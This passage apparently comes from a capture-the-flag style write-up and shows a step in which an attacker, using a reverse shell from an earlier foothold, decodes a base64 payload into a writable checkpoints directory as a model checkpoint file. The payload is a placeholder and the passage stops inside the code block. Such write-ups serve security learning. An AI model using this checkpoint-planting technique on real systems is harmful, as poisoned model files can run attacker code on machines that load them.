Meraj1312/Write-Ups/bedside.md

 #### Step 2: Write Checkpoint

 The datawrangler user has write access to `/datastore/checkpoints/`.
+Using the reverse shell from the initial foothold:

 ```bash
 echo "<BASE64_OUTPUT>" | base64 -d > /datastore/checkpoints/checkpoint_epoch_1000.pt